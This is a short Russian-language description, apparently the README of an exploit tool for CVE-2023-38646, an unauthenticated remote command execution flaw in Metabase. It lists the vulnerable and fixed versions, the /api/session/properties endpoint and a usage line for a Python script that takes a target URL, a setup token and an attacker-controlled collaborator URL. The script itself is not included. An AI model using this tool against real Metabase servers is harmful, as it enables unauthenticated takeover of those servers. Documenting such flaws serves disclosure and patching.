
Metabase Pre-auth RCE

Metabase open source до версии 0.46.6.1 и Metabase Enterprise до версии 1.46.6.1 позволяют злоумышленникам выполнять произвольные команды на сервере с уровнем привилегий сервера. Для эксплуатации аутентификация не требуется. Другие исправленные версии: 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2 и 1.43.7.2.
http://vulnerablehost.com/api/session/properties
-u - URL цели-t - Токен установки-c - URL коллаборатораpython3 CVE-2023-38646.py -u <target> -t <setup-token> -c <collaborator-url>